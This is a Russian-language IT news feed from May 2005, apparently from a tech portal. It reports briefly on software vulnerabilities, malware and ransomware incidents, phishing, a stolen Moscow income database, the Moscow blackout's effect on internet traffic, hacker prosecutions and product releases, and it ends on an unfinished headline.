В следующей версии Office компания Microsoft позволит предприятиям устанавливать правила, за исполнением которых будет следить серверное ПО и определяющие порядок работы с секретными документами. Более 20 лет документы Word и Excel свободно обращались в корпоративных стенах. Сначала, чтобы переносить созданные этими программами документы из отдела в отдел, сотрудники пользовались дискетами. Электронная почта упростила распространение файлов, позволив «гонять» их между филиалами по всему земному шару. Однако с принятием федеральных законов, регулирующих делопроизводство, таких как Акт Сарбанеса-Оксли и «Акт о передаче данных медицинского страхования и возможности их учета» (Health Insurance Portability and Accountability Act), которые вводят строгие правила по администрированию и архивированию информации в компаниях, этим вольностям приходит конец. Это важный момент для Microsoft, которой нужно, чтобы предприятия продолжали держать компьютерные файлы Excel (а также Word и PowerPoint), несмотря на изменение правил. «У нас есть возможность предоставить ИТ-подразделениям средства управления, отвечающие этой концепции, которую мы называем „документ на миллион долларов”; речь идет о таких документах, в которых содержится интеллектуальная собственность компании, — сказал вице-президент отделения Microsoft Information Worker Крис Капоссела на недавнем организованном компанией саммите СЕО в Редмонде. — Эти средства позволят ИТ-подразделению взять такие документы под свой контроль. Но мы хотим также, чтобы люди по-прежнему могли создавать их в Excel». В следующей версии Office компания Microsoft позволит предприятиям устанавливать правила, за исполнением которых будет следить серверное ПО и определяющие порядок работы с такими документами. Это лишь часть «новых условий работы», которые должно создать следующее поколение ПО Microsoft Office.
Более подробно

26/05/2005 12:46 Cisco заделывает новые "дыры" в своем сетевом оборудовании
Компания Cisco, ведущий производитель оборудования для построения компьютерных сетей, выпустила обновления для программного обеспечения, встраиваемого в ее продукцию, с целью ликвидировать несколько критичных "дыр". Об обнаружении "дыр" накануне сообщил британский Национальный инфраструктурный центр по координации в сфере безопасности (NISCC). Специалисты центра выявили, что ряд сетевых коммутационных устройств, производимых Cisco, имеет уязвимости в системе безопасности, позволяющие вывести их из строя. Это касается механизмов, отвечающих в оборудовании за работу системы распознавания доменных имен DNS и устройств для работы с протоколами IP-телефонии. Как было установлено, сетевые злоумышленники могут обратиться к определенным моделям коммутационного оборудования Cisco со особым образом сформированными запросами, что может вызвать сбои в работе или выход из оборудования из строя. Учитывая то, что на базе техники от Cisco построено большинство компьютерных сетей мира, масштабная атака подобного рода теоретически может вызвать существенные затруднения в работе Интернета.
Подробности

26/05/2005 12:31 Пираты похитили базу данных о доходах москвичей
На днях в продажу на пиратских ранках поступила база данных о доходах жителей столицы за 2003 год. В ней содержатся сведения о том, где человек работает и работал в течение пяти лет с указанием его доходов, мест работы, реальных адресов и паспортных данных. По всей видимости, информация о краже правдивая. Копия базы оказалась в распоряжении "Ведомостей" - первоисточника данной новости. В ней более 9,3 млн справок о доходах москвичей за 2003г. с помесячной разбивкой, месте работы, реквизитах и адресе налогоплательщиков. Указанные в базе доходы и данные сотрудников "Ведомостей" оказались верными, отмечает газета.
Подробнее: РосБизнесКонсалтинг

25/05/2005 21:00 Взломана новая антипиратская технология от Microsoft
Индийский консультант по компьютерной безопасности Дибасис Моханти опубликовал работу, в которой рассказывает о методах, при помощи которых можно легко обойти новую систему защиты от копирования, разработанную программистами из Microsoft. Суть данной технологии сводится к запрещению создания нелегальных дисков с копиями ОС Windows и невозможностью их дальнейшего использования. Данная новость особенно актуальна сейчас. Напомним, в настоящее время софтверный гигант проводит акцию "Подлинная Windows - подлинные преимущества", цель которой уменьшение количества пиратских копий продуктов Microsoft. В рамках даной инициативы новые копии дистрибутивов будет невозможно нелегально установить и подключиться к серверу обновлений. Технология развертывает приложение на системе пользователя, которое проверяет подлинность программного обеспечения и генерирует специальный опознавательный код, который является ключем к серверу обновлений. Каждый код вводится только 1 раз. Однако пользователи могут использовать аутентификационный код на разных машинах, получая доступ к серверу обновлений на машинах, где не прошла проверка подлинности. Представители Microsoft с сожалением подтвердили, что таким методом можно обойти новую систему защиты. Тем не менее, в целом система эффективна. Дело в том, что срок действия кода, произведенный утилитой проверки, истекает довольно быстро. Таким образом, применение привычных методов взлома, таких как скачивание ключей с каких-либо сайтов бесполезно. На данный момент в Miсrosoft не планируют менять принцип работы системы защиты.
Источник

25/05/2005 20:47 Вирус под видом заплатки Windows
"Пиратская" версия плановой модернизации от Microsoft приходит в виде своего рода "уведомления" пользователям, приглашая выполнить прилагаемый файл, являющийся якобы очередной заплаткой Windows. На самом же деле, прилагаемый к этим письмам файл содержит полиморф W32.Pinfi, известный также под именами Pate и Parite. Этот вирус довольно активно распространяется по локальной сети, поражая файлы скринсейвера , и каждый раз активируется, как только на пользовательском ПК включается "заставка". Вирус способен поражать системы под управлением Windows NT, Windows 2000, Windows XP, Windows МE и даже Windows 98, Windows 95! Излишне говорить, что настоящие модернизации производятся только через специально разработанную для этого встроенную систему Windows Update.
Источник

25/05/2005 17:27 Рунет наглядно продемонстрировал свою беззащитность
Сегодня в полдень почти вся Москва была обесточена. Московские сайты массово ушли в даун. Но настоящей катастрофой для российского интернета стало отключение питания в точке обмена трафиком MSK-IX. Российский сегмент интернета наглядно продемонстрировал свою беззащитность перед факторами техногенного характера. Узел MSK-IX (М-9) — это главная точка обмена трафиком, к которой подключены почти все московские провайдеры. Физически она расположена возле ст. м. Калужская в Москве. Почему была отключена М-9 — не совсем непонятно, потому что там должен быть установлен мощный источник резервного питания. Но факт остается фактом. В результате отключения М-9 от российского интернета осталась лишь бледная тень. В нормальных условиях через М-9 проходит 80% всего трафика в российском интернете. После аварии весь трафик, естественно, пошел через зарубежные каналы. Совокупная емкость зарубежных каналов меньше, чем российских, да и многие из них тоже были подключены М-9, поэтому в какой-то момент зарубежные каналы стали падать и очень сильно тормозить. По сути, российский интернет разбился на региональные секторы, которые располагаются на местных ресурсах. Каналы, связывающие регионы с Москвой, просто прекратили функционировать одновременно с М-9. Хотя в Москве большинство крупных дата-центров продолжало работать, но из-за отключения М-9 перестали работать каналы доступа, по которым московские провайдеры подключались к интернету. Соответственно начали «отваливаться» потребители. Как сообщили представители «Яндекса», количество посещений сайта снизилось примерно вдвое. Из компаний «большой тройки» не работал сайт компании Rambler (впрочем, он не работает до сих пор). Сайты «Яндекса» и Mail.Ru работают. У пользователей почты Mail.Ru наблюдаются случаи утери корреспонденции (письма, посланные днем, не дошли до адресата). Прекратили работу и крупнейшие интернет-СМИ, в том числе Lenta.Ru и Gazeta.Ru. Сайт РБК грузится очень медленно через зарубежные каналы. Только в 13:20 по МСК подача электроэнергии к точке М-9 была восстановлена на треть: «Дали чуть-чуть. Один луч из трех мы уже запустили», — сказал несколько часов назад в интервью «Интерфаксу» один из работников телекоммуникационного узла. Но проблемы с интернетом сохраняются до сих пор. Как резюме: главная проблема в том, что на сегодняшний день нет альтернативы московской точке обмена трафиком М-9, а это значит, что интернет в Москве можно вырубить очень просто, даже проще, чем можно было подумать. Первый «блэкаут» в Москве показал, что крупным дата-центрам нужно соединяться между собой, а крупным потребителям надо подключаться непосредственно к производителям трафика. И нечего платить М-9, если она не может обеспечить нормальную стабильность работы.
"Вебпланета"

25/05/2005 14:03 Контратака на "зомби"
Федеральная комиссия США по связи (FTC) совместно с властными органами 30 стран Европы, Азии и Латинской Америки готовит к старту просветительскую кампанию для Internet-провайдеров, призванную повысить их осведомленность о методах борьбы с компьютерами-"зомби" - системами, зараженными троянскими программами, которые без ведома пользователей осуществляют несанкционированные почтовые рассылки и организуют DoS-атаки. По данным FTC, через "зомби"-сети сейчас рассылается от 80 до 90% спама, а по информации CipherTrust, в среднем ежедневно выявляется по 157 тыс. новых систем-"зомби", причем большинство из них - за пределами Северной Америки. В рамках кампании FTC будет, в частности, рассылать провайдерам письма с напоминанием о необходимости проверки трафика их сетей в целях идентификации спамеров и нелегальных почтовых серверов.
"Открытые системы"

25/05/2005 13:29 Укрепление защиты Apache и PHP
В статье "Securing Apache and PHP" предлагается несколько советов по повышению защиты web-сервера, сообщает opennet.ru. Автор придерживается методики максимального сокрытия дополнительной информации, которую может получить атакующий, для снижения вероятности поражения различными червями и ботами.
Cтатья

25/05/2005 13:17 В Волгограде завершено расследование уголовного дела группы хакеров
В Волгограде завершено расследование уголовного дела по фактам неправомерного доступа группы из 39 человек к охраняемой законом компьютерной информации. Как сообщил на пресс-конференции во вторник начальник отдела по надзору за следствием и дознанием в областных правоохранительных органах Волгоградской областной прокуратуры Олег Степанников, 15 сентября 2004г региональное ГУВД возбудило уголовное дело по фактам неправомерного доступа к охраняемой законом компьютерной информации. В процессе расследования было выявлено еще 140 эпизодов, в итоге 14 уголовных дел были объединены в одно производство, по которому проходили 39 человек. "Используя вредоносные компьютерные программы, взломщики проникали в компьютерную сеть и получали доступ к логинам и паролям различных пользователей Интернета. В частности, преступники получили доступ к компьютерной сети крупных фирм, государственных учреждений, частных лиц и школ" ,- отметил О.Степанников. По его словам, на жестких дисках изъятых компьютеров было порядка 800 незаконно скопированных логинов и паролей, которые позволяли незаконно пользоваться сетью Интернет. В отношении 37 человек дело было прекращено в связи с их деятельным раскаянием. Двум лицам, игравшим наиболее активную роль в совершении преступлений, предъявлено обвинение по ст. 272 УК РФ (неправомерный доступ к компьютерной информации) и ст. 273 УК РФ (использование вредоносных программ). Уголовное дело передано в суд.
Источник

25/05/2005 12:34 Спамеры выявляют целевые аудитории
Спамеры и фишеры используют новые виды атак для того, чтобы получить максимальное количество данных о пользователях — от их политических взглядов до сексуальной ориентации. Такого мнения придерживаются специалисты калифорнийской компании Blue Security, сообщает сайт Security Pipeline. К нововведениям интернет-преступников Blue Security относит так называемые «регистрационные атаки» и «атаки с напоминанием пароля». Оба типа атака позволяют злоумышленникам составить подробный портрет интернет-пользователя, считает глава Blue Security Эран Решеф. В ходе «регистрационной атаки» спамеры с помощью специальных скриптов регистрируют большое количество электронных адресов в базах пользователей сайтов. Серверы обычно выдают сообщения об ошибках в случаях, когда пользователи пытаются регистрировать уже существующие адреса. Таким образом, спамеры не только точно знают, какие из адресов уже действительно существуют, но и на каких сайтах они зарегистрированы. Сопоставив электронный адрес с сайтом, спамеры могут получить подробный профиль пользователя. Если адрес используется службой знакомств для людей от 55 лет, спамер может занести его обладателя в указанную возрастную группу. Аналогичным образом можно выяснить половую ориентацию пользователя или его спортивные увлечения. Атака с напоминанием пароля схожа с регистрационной атакой. В данном случае спамеры используют сервис, который при запрашивании пароля к тому или иному адресу сообщает, зарегистрирован такой адрес или нет.
Источник

25/05/2005 11:40 Уязвимости в антивирусах Computer Associates
В одной из программных библиотек антивирусных продуктов Computer Associates обнаружена опасная уязвимость, которая теоретически позволяет получить несанкционированный доступ к удаленному компьютеру. Проблема связана с модулем Vet Antivirus Engine (VetE.dll). Направив жертве сформированный особым образом документ Microsoft Office, злоумышленник может спровоцировать ошибку переполнения "кучи" (области памяти, выделяемой приложению для динамически размещаемых структур данных) и выполнить на машине произвольные вредоносные операции. Датская компания Secunia присвоила дыре рейтинг высоко критичной. Уязвимость присутствует в таких программных продуктах Computer Associates, как eTrust Antivirus 6.x/7.х, eTrust EZ Antivirus 6.x/7.х, eTrust EZ Armor 2.x, eTrust InoculateIT 6.x for Windows, eTrust Intrusion Detection 3.x и eTrust Secure Content Manager (SCM). Разработчиками выпущены обновления.
Обновление

25/05/2005 11:23 Половина Москвы осталась без электричества
Москва сегодня столкнулась с энергетическим кризисом, напоминающим перегрузку энергосети США и Канады в 2003 году. Из-за аварии на одной из подстанций в Капотне во вторник вечером возник дефицит электричества. В результате этого при повышении нагрузки с утра 25 мая начались неконтролируемые отключения других московских подстанций. В итоге к 12 часам дня была парализована работа половины станций московского метро - поезда останавливались прямо в тоннелях и людей выводили наверх по рельсам. Отключились светофоры, что немедленно привело к автомобильным пробкам на улицах - столичное ГИБДД пытается исправить ситуацию при помощи регулировщиков. В некоторых домах отсутствует не только электричество, но и водоснабжение из-за остановившихся без электричества насосных станций. По некоторой информации, частично обесточена точка M9 на улице Бутлерова, через которую проходит российский и зарубежный трафик большинства интернет-провайдеров и операторов связи. Мобильные сети Москвы перегружены - дозвониться очень сложно. Тем не менее, московские власти заявляют о том, что все стратегические объекты столицы не пострадали, поскольку они оснащены полностью автономными источниками питания. Постепенно востанавливается работа части подстанций. По оценкам РАО "ЕЭС России", на восстановление энергоснабжения Москвы в полном объеме уйдет порядка суток.
Источник

24/05/2005 17:34 Украина: приказ о регистрации электронных инфоресурсов вызвал переполох
Согласно новому приказу Министерства транспорта и связи, информационные интернет-ресурсы в Украине подлежат государственной регистрации. Политики заявляют, что он угрожает свободе слова. Эксперты говорят, что приказ коснется только госресурсов, а все остальные будут регистрироваться добровольно. Приказ Минтранса "Об утверждении Порядка проведения государственной регистрации электронных информационных ресурсов" уже зарегистрирован в Министерстве юстиции и 29 мая должен вступить в силу. Целью введения госрегистрации Минтранссвязи называет "обеспечение реализации концепции формирования национальных электронных информационных ресурсов". Все зарегистрированные сайты получат специальное свидетельство и будут внесены в в Национальный реестр электронных информационных ресурсов. В регистрации будет отказано тем сайтам, которые: содержат гостайну; информацию с "ограниченным доступом" (в приказе не уточняется, как именно); информацию, распространение которой запрещено законодательством. Инфоресурс также не может содержать призывов к захвату власти, насильственной смене конституционного строя, нарушения территориальной целостности и неприкосновенности Украины. В регистрации будет отказано сайтам, содержащим пропаганду терроризма, войны, геноцида, культа насилия и жестокости, а также ресурсам расистской направленности. Кроме того, свидетельство о госрегистрации не смогут получить сайты, на которых размещается информация наносящая ущерб деловой репутации и достоинству отдельных лиц, информация, содержащая ненормативную лексику или порнографию. Заявки на регистрацию будет рассматривать новосозданная комиссия: она будет принимать решение о выдаче соответствующего свидетельства или отказе в регистрации.
Источник

24/05/2005 17:01 Sun критикует проект открытой версии J2SE
Компания Sun Microsystems выразила «серьезные сомнения» насчет полезности проекта Apache Foundation по созданию открытой реализации Java 2 Standard Edition (J2SE). Джеймс Гослинг (James Gosling), создатель Java и вице-президент Sun по этому языку программирования, пояснил, что не понял, зачем консорциум взялся за такой проект. "Я никогда не сделаю это, — заявил он по поводу Apache Harmony. — В мире слишком много более интересных вещей». «[Apache] много говорит о том, что они с ним [Harmony] будут делать. Так почему же столь важна разница между нашей лицензией на исходники и той, что, как они полагают, подходит [для Java]?.. Я понимаю, почему они хотят, чтобы она была другой. Но с нашей позиции это будет скорее деструктивным шагом, а не полезным. Он сводится к разветвлению: они уверены, что возможность отделиться — абсолютно необходимое право».
Nixp.Ru

24/05/2005 16:18 Виджеты могут причинить вред пользователям Mac OS X
Нововведения, предложенные разработчиками операционной системы Mac OS X 10.4 Tiger, представляют серьезную угрозу для пользователей компьютеров Apple. С таким заявлением выступил американский программист Джонатан Здзиарски (Jonathan Zdziarski), сообщает сайт News.com. Беспокойство Здзиарского вызывают виджеты — небольшие программные модули, которые устанавливаются на компьютер пользователя одновременно с загрузкой. Виджеты обеспечивают удобство работы пользователя с новой инструментальной панелью Mac OS — Dashboard. Она позволяет получать быстрый доступ к такой информации, как прогнозы погоды, расписания авиарейсов, курсы валют и котировки акций. Однако среди полезных виджетов могут оказаться и вредоносные модули, которые позволят злоумышленнику получить администраторский доступ к операционной системе. Apple выпустила обновление Mac OS X 10.4.1, которое запрашивает у пользователя подтверждение на загрузку того или иного виджета. В то же время, пользователь не получает информации о том, что виджет устанавливается одновременно с загрузкой. «Они существенно исказили значение слова "загрузка". Когда я нажимаю "загрузить", то подразумеваю, что всего лишь загружаю программу. А виджет при этом устанавливается», — уточняет программист. Вредоносный виджет после установки может работать незаметно для пользователя, в том числе и в то время, когда пользователь использует администраторский доступ. Это может привести к тому, что автор вредоносной программы получит полный контроль над атакуемой машиной.
Источник

24/05/2005 15:54 Российский суд будет разбираться с бандами хакеров
Следственный комитет при МВД России в ближайшее время направит в суд материалы по нескольким громким уголовным делам, связанным с компьютерными преступлениями. Об этом сегодня на брифинге в Москве сообщил исполняющий обязанности замначальника следственного комитета при МВД РФ Валерий Сызранцев. По его словам, в июне 2004г. комитетом было возбуждено уголовное дело по запросу посла Великобритании в России, в котором содержалась информация о деятельности преступной группы российских хакеров, осуществляющих вымогательство крупных денежных средств у британских он-лайновых букмекерских компаний и казино путем блокирования их серверов с помощью DDoS-атак. В ходе расследования было установлено, что преступная группа блокировала работу серверов этих компаний и вымогала у каждой из них по 40 тыс. долл. После многократных выплат этой суммы компании приняли решение обратиться в правоохранительные органы. Российскими правоохранительными органами были установлены IP-адреса компьютеров, с которых блокировались серверы британских компаний, и установлены конкретные лица, проживавшие в разных городах России. Всего по данному делу задержаны пять человек. Еще одно громкое дело, связанное с хищением информации с кредитных пластиковых карт, также в ближайшее время будет направлено в суд. В.Сызранцев пояснил, что при отработке сведений, полученных от ФСБ России, сотрудниками милиции были задержаны 6 человек. А по полученной от них информации, спецслужбами США были арестованы еще 15 человек. Следствием установлено, что преступники использовали кредитные карточки для хищения находящихся на них денежных средств. В настоящее время установлено, что прямой ущерб от этого составил несколько миллионов долларов.
Более подробно

24/05/2005 15:09 Уязвимость в ZoneAlarm
Alex Wheeler сообщает о наличии уязвимостей в семействе продуктов ZoneAlarm: Security Suite и Antivirus. Используя уязвимость, атакующий может скомпрометировать систему. Уязвимы версии ветви 5. Обновлений пока не выпущено. Автором опбликован документ в PDF-формате, описывающий уязвимость.
Описание уязвимости

24/05/2005 14:48 Microsoft начала ловить хакеров "на живца"
Microsoft реализует проект по созданию сети мобильных приманок для привлечения вредоносного кода. Цель проекта — изучение технологий хакинга для выработки стратегий борьбы с ним. Обычно онлайновые ловушки (honeypots) — это слабо защищенные компьютеры, специально предназначенные для приманки хакеров. В отличие от других, ловушки от Microsoft — мобильные. Это виртуальные машины, «мониторящие» Сеть на предмет наличия сайтов, с которых осуществляются хакерские атаки. Если такой сайт найден, то запускается система оповещения и ПО Strider, анализирующее происходящее. Каждый компьютер-приманка «заходит» на 7 тыс. веб-сайтов в день. По мнению разработчиков, мобильная система ловушек даст более ясную картину наличия эксплойтов в интернете, позволит быстрее оповещать пользователей об угрозахи разрабатывать более защищенное ПО. Однако некоторые эксперты опасаются, что хакеры научаться распознавать машины-ловушки, в частности, по высокой скорости «хождения» по интернету, сообщил РС Рro.
Источник

24/05/2005 13:46 Microsoft приоткрыла завесу над Longhorn
Microsoft выпустила бесплатный пакет средств разработки приложений для своей новой операционной системы Longhorn. Пакет под названием Beta 1 Release Candidate предназначен для разработок под презентационный движок Avalon, архитектуру веб-сервисов Indigo, ID-систему InfoCard и формат документов Metro. Все они входят в состав дополнений к Windows, которые должны выйти с ОС Longhorn, бета-версия которой должна появиться летом, а полная версия — во второй половине 2006 г. В Microsoft говорят, что пакет выпущен в целях ознакомления программистов-разработчиков с Longhorn и повышения интереса к созданию Windows-приложений.
CNews

24/05/2005 13:34 Фишеры прикрылись именем Бюро переписи населения США
Бюро переписи населения США (Census Bureau) при участии ФБР удалось прекратить деятельность мнимого веб-сайта Census Bureau, сообщает AFP. Было установлено, что этот сайт запущен в работу фишерами, которые выманивают у наивных граждан конфиденциальную информацию о номерах кредитных карт, паролях и логинах. Мошенники начали с рассылки электронных писем, в которых содержалась информация о новом опросе, организованным якобы Бюро переписи населения и затрагивавшим проблему войны в Ираке. В рамках привлечения наивных пользователей мошенники даже предлагали 5 долларов США в качестве денежной компенсации за беспокойство и трату времени. Как водится, адресату предлагалось пройти по ссылке на "официальный" сайт бюро и ответить на ряд вопросов. В конце у пользователя запрашивалась информация о номере его кредитной карты, а также идентификационном коде для перечисления обещанных пяти долларов. Доступ к сайту был перекрыт спустя лишь несколько часов после появления первых сообщений о случившемся. Расследование же по факту мошенничества будет вести ФБР.
Источник

24/05/2005 13:21 Хакеры изобрели способ "захватывать в заложники" электронные документы
Американская фирма Websense, специализирующаяся на компьютерной безопасности, обнародовала информацию о выявленном ее специалистами случае захвата электронных документов "в заложники". По ее сообщению, некие хакеры взломали компьютер одного из ее клиентов, получили доступ к хранящимся на нем важным документам, зашифровали их, а затем обратились к пострадавшему лицу с требованием выплатить 200 долларов за криптографические ключи, дающие возможность расшифровать "похищенные" файлы. Сведения о том, кто конкретно подвергся этому новому виду атаки, не разглашаются. Как отмечает Associated Press, специалисты ФБР США изучили ситуацию и признали, что в данном случае действительно речь идет о принципиально новом виде компьютерного преступления. Было установлено, что хакеры использовали стандартную схему установки на компьютер вредоносного модуля через специальным образом сформированную интернет-страницу. Пострадавшего пользователя заманили на нее, после чего установили на его компьютер "трояна", который позволил произвести криптографические операции с документами. После этого жертве было отправлено электронное письмо с условиями "освобождения" захваченных данных. Ранее компьютерный шантаж обычно сводился к тому, что хакеры угрожали владельцам сайтов атаками, способными вывести сайт из строя, а также возможностью несанкционированного копирования и последующего распространения конфиденциальной коммерческой информации, отмечают в ФБР. В случае описанного прецедента захваченные документы были расшифрованы специалистами без применения требовавшихся ключей. Кроме того, использовавшийся хакерами сайт был оперативно закрыт в результате действий правоохранительных органов и соответствующего хостинг-провайдера по стандартной схеме. Тем не менее, специалисты отмечают, что в будущем захватчики могут применить более сложные алгоритмы шифрования, которые не позволят столь быстро "освободить" данные. Вместе с тем, также подчеркивается, что требование денег является "слабым местом" подобной вымогательской схемы, так как денежные транзакции легко отслеживаются
Подробности

24/05/2005 12:57 Deer Park Alpha 1 Release Candidates
Asa Dotzler объявил о выходе релиз кандидата первой альфа версии Mozilla Firefox 1.1, сообщает linux.org.ru. Приглашаются к тестированию все желающие. Браузер имеет огромное количество новведений, например возможность мгновенного перехода по истории назад и вперёд без перерендеринга страницы или возможность разделения профиля на две части - одна т.н. temp часть, где хранится кэш браузера и другая статическая, которую можно хранить на сетевых папках.
Подробнее

24/05/2005 12:31 Apple Computers готова перейти на Intel
Компания Apple Computers ведет переговоры с корпорацией Intel о возможном использовании ее процессоров в своих компьютерах Macintosh, сообщает Reuters. По некоторым данным, стороны готовы заключить соответствующее соглашение, однако представители компаний отказалось комментировать эту информацию. По мнению аналитиков, ожидавших подобных шагов от Apple, соглашение едва ли будет достигнуто. "Слишком многое придется менять в программном обеспечении", - отмечают они. Компания пошла на переговоры с целью получения рычагов воздействия на своего основного поставщика процессоров в настоящее время, корпорацию IBM, полагают наблюдатели. Между тем, если в компьютерах Macintosh будут использоваться чипы Intel, то в будущем цена систем от Apple будет сопоставима с ценой компьютеров на платформе РС, считают эксперты. После публикации сообщения о переговорах биржевая цена акций Apple поднялась на 5,9 процента, а акций Intel - на 15 процентов, отмечает информационное агентство.
Источник

23/05/2005 17:34 Что дешевле исправлять — Windows или open-source?
Заверения Microsoft, будто исправление ПО Windows обходится дешевле по сравнению с open-source-альтернативами, вызвали горячие споры. Исследование, выполненное в свое время по заказу Microsoft ее бизнес-партнером Wipro, выявило основные источники «экономии» от использования Windows. В результате опроса 90 организаций обнаружилось, что установка патчей на серверы баз данных на платформе Windows обходятся на 33% дешевле по сравнению с их open-source-аналогами. Стоимость исправления Windows-клиентов респонденты оценили в среднем на 14% ниже. Эти результаты критикуют уже несколько кварталов, причем некоторые критики называют их нереалистичными и устаревшими. «Подобные исследования не могут служить руководством к действию при планировании процесса установки исправлений или технического обслуживания приложений, — говорит аналитик Frost & Sullivan Australia Джеймс Тернер. — У всех организаций разные потребности… Нужно руководствоваться коэффициентом окупаемости инвестиций (ROI) и общей стоимостью владения (TCO) — это оценки поставщика». Пол Кангро, менеджер по решениям Novell для Азиатско-Тихоокеанского региона, выделил ряд проблем этого исследования. Хотя оно проводилось в прошлом году, в нем упоминаются задачи, стоявшие перед администраторами в 2003 году — до того, как в инструменты обновления Linux были внесены существенные усовершенствования. «Тогда у нас не было таких инструментов, как Xen for Linux. Теперь, когда я устанавливаю исправления на свою Linux-систему, мне не нужно включать и выключать ее по несколько раз». К тому же в исследовании не упоминается о расходах, связанных с перезагрузкой систем после установки исправлений. «При установке исправлений на Windows-системы обычно приходится выбирать такое время, чтобы ее можно было отсоединить от сети и перезагрузить. В отчете об этом нигде не упоминается, что мне кажется довольно странным», — говорит Кангро.
Более подробно

23/05/2005 14:34 Уязвимость в bzip2
Chris Evans cообщил об обнаружении уязвимости в популярном в мире открытых систем архиваторе bzip2. В результате ошибки в исходном коде при разборе специальным образом сформированного bzip2-файла может возникнуть ситуация, когда все ресурсы компьютера (дисковое пространство и загрузка ЦПУ) будут исчерпаны. Подобная ситуация может быть вызвана файлом, который получил название "декомпрессионной бомбы" ("decompression bomb"). Для устранения уязвимости рекомендуется обновиться до версии 1.0.3. Хотелось бы заметить, что уязвимость существует и в продуктах, основанных на исходном коде bzip2 - например, в архиваторе Mac OS/X. Автором предложен демо-код, демонстрирующий уязвимость.
Описание уязвимости

23/05/2005 14:03 Обмен документами через браузер
Компания Advanced Reality разработала систему поддержки совместной работы Jybe с пользовательским интерфейсом, доступным через браузер. Система состоит из серверной и клиентской части, представляющей собой подключаемый модуль, который имеется в версиях для Internet Explorer и Mozilla Firefox. После инсталляции клиента в браузере появляются две новые клавиши - для вызова участников на сеанс связи и для обмена документами. Чтобы совместно используемые документы PowerPoint, Word и Excel можно было просматривать через браузер, сервер предварительно преобразует их в формат HTML. Функции контроля пользовательского доступа система реализует за счет интеграции с корпоративной службой каталогов. Jybe 2.0 также интегрируется с VoIP-клиентом Skype и может пользоваться адресной книгой Outlook и списками контактов из клиентов различных IM-сервисов.
Источник

23/05/2005 13:21 Safe'n'Sec: новое средство защиты корпоративных сетей
Компания StarForce Technologies объявляет о выходе бета-версии нового продукта Safe’n’Sec Business, который предназначен для защиты корпоративных сетей от шпионских программ, вирусов и других угроз. Решение Safe’n’Sec разработано с учетом специфики сетей, общее количество машин в которых не превышает одной тысячи. Корпоративная версия Safe’n’Sec Business интегрируется в многоуровневую систему безопасности предприятия, как в уже существующую, так и вновь выстраиваемую и совместима с антивирусными продуктами и брандмауэрами ведущих разработчиков. Мобильная консоль управления обеспечивает централизованную установку, удаление, изменения локальных настроек безопасности и получение статистики и отчетов, что позволяет осуществлять администрирование системы безопасности корпоративной сети с любой рабочей станции. Safe’n’Sec — это новое поколение систем защиты от ранее неизвестных вирусов, программ-шпионов, троянских программ, хакерских атак, взлома, кражи информации, а также от ошибочных действий пользователя. Эффективность превентивной защиты Safe’n’Sec не опирается на анализ кода вредоносных приложений и, следовательно, не зависит от частоты обновления.
CNews

23/05/2005 12:59 Microsoft способствует росту Sourceforge
Число проектов на сайте Sourceforge.net достигло 100 тыс., отчасти благодаря видным вкладам «таких ведущих организаций, как Microsoft». В среду Sourceforge преодолел важный рубеж, зарегистрировав стотысячный проект. Веб-сайт, ведущий каталог приложений open-source, утверждает, что важным фактором его успеха стала публикация исходного кода крупными организациями. «Популярность SourceForge.net продолжает быстро расти, благодаря новым видным проектам, публикуемым такими ведущими организациями, как NASA, Microsoft, Google, IBM и Salesforce.com», — говорится в заявлении компании Open Source Technology Group, стоящей за Sourceforge.net. Microsoft выложила на сайт несколько проектов, включая инструмент коллективной работы на базе Web FlexWiki; набор шаблонов Windows Template Library для упрощения создания Windows-программ; а также набор инструментов Windows Installer XML, предназначенных для создания инсталляционных пакетов Windows-продуктов. За последние два месяца эти инструменты, по данным OSTG, претерпели в общей сложности свыше 21 тыс. загрузок.
ZDNeet

23/05/2005 11:54 Microsoft призывает шифровать пароли
Компании, специализирующиеся на безопасности, давали своим клиентам ложные советы, считает Джеспер Йохансон, старший менеджер отдела безопасности корпорации Microsoft. По его словам, руководство фирм в США напрасно запрещает своим сотрудникам хранить пароли от разных ресурсов в одном зашифрованном файле. Во многих фирмах в США существует запрет записи паролей к доступу к компьютерам, архивам и документам в один зашифрованный файл. Джеспер Йохансон, выступая на открытии конференции AusCERT, заявил о необходимости отменить такие запреты. Он аргументировал свою позицию тем, что пользователи не могут держать в голове десятки паролей для доступа к различным ресурсам и предпочитают использовать везде одно и то же кодовое слово. А это, в свою очередь, облегчает задачу мошенников, которые пытаются получить несанкционированный доступ к системам. Г-н Йохансон привел пример из личного опыта. По его словам, сам он имеет 68 паролей, которые у него надежно спрятаны. Если бы ему это запретили, то пришлось бы использовать один-два легко запоминающихся слова для всех ресурсов. Делегаты конференции согласились, что совет г-на Йохансона имеет смысл. Один системный администратор из международной компании, который попросил не называть имени, сказал, что, несмотря на угрозу увольнения, сам использует зашифрованные файлы с паролями, иначе пришлось бы полдня вспоминать, какой и куда пароль ввести.
Источник

23/05/2005 11:18 Выход Netscape 8.0.1
Как мы сообщали ранее, в недавно вышедшей версии Netscape 8 разработчиками были не устранены важные уязвимости, устранённые ранее в версиях Mozilla и Firefox. Появление Netscape 8 вызвало некоторое недовольство у сообщества Mozilla. Бен Гуджер, один из ведущих программистов Firefox, заметил, что разработчики браузеров, являющихся производными от Mozilla, никогда не смогут устранять уязвимости в своих продуктах так же оперативно, как это делает сама Mozilla. После опубликования информации об уязвимостях разработчики Netscape вынуждены были в срочном порядке выпустить версию 8.0.1, которая сейчас доступна на сайте. Компания все еще работает над механизмом автоматического обновления, так что пока, чтобы получить исправленный браузер, нужно зайти на веб-сайт Netscape.
Обновлённая версия браузера

23/05/2005 10:44 Китайские власти будут следить за каждым китайским форумом
Китайские власти намерены внедрить своих агентов влияния в популярные китайские чаты и форумы. Государственные чиновники будут работать под прикрытием, выдавая себя за обычных пользователей, сообщает РИА "Новости" со ссылкой на китайскую прессу. Главной задачей для агентов станет направление дискуссии по "чувствительным" вопросам в нужное для властей русло. Китайские газеты пишут, что специальные отделы уже созданы в трех китайских провинциях. В прошлом году на специальных курсах по интернет-пропаганде, организованных при отделах пропаганды Компартии Китая, прошли обучение 127 китайских чиновников. К кандидатам на роль интернет-пропагандистов выдвигаются довольно строгие требования. Они должны понимать государственную политику и быть идеологически надежными и подкованными. По мнению экспертов, именно чаты, форумы и интернет-дневники сегодня являются наиболее свободной зоной в китайской части всемирной паутины. Они практически не подвержены внешней цензуре. Например, антияпонские демонстрации, захлестнувшие Китай в начале апреля этого года, координировались, в основном, через форумы.
Подробности

22/05/2005 16:18 «Устраненная» уязвимость в KDE вновь дает о себе знать
